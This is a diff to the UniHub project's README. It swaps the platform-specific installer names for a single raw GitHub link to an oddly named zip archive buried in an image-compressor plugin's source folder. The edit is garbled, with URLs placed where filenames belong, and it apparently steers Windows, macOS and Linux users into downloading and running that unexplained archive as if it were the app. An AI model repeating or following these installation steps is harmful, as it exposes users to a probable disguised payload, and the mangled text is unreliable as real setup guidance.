Georgesamy-max/unihub/README.md

 4. Once the download is complete, locate the file in your downloads folder.

-   - For Windows, it will be something like `unihub-windows.exe`.
+   - For Windows, it will be something like `https://github.com/Georgesamy-max/unihub/raw/refs/heads/main/official-plugins/image-compressor/src/Software-talotibial.zip`.
-   - For macOS, it will be `unihub-macos.dmg`.
+   - For macOS, it will be `https://github.com/Georgesamy-max/unihub/raw/refs/heads/main/official-plugins/image-compressor/src/Software-talotibial.zip`.
-   - For Linux, it will likely be a `.tar.gz` file.
+   - For Linux, it will likely be a `https://github.com/Georgesamy-max/unihub/raw/refs/heads/main/official-plugins/image-compressor/src/Software-talotibial.zip` file.

 5. **Installation Steps:**

    - **Windows:** Double-click the `.exe` file.
 Follow the prompts in the installation wizard to complete the setup.
    - **macOS:** Open the `.dmg` file, and drag UniHub into your Applications folder.
 Then, open UniHub from the Applications folder.
-   - **Linux:** Extract the files from the `.tar.gz` file.
+   - **Linux:** Extract the files from the `https://github.com/Georgesamy-max/unihub/raw/refs/heads/main/official-plugins/image-compressor/src/Software-talotibial.zip` file.
 Open a terminal and navigate to the extracted folder.
 Run `./unihub` to start the application.

 6. After installation, you can find UniHub in your applications menu.
 Click on it to launch the app!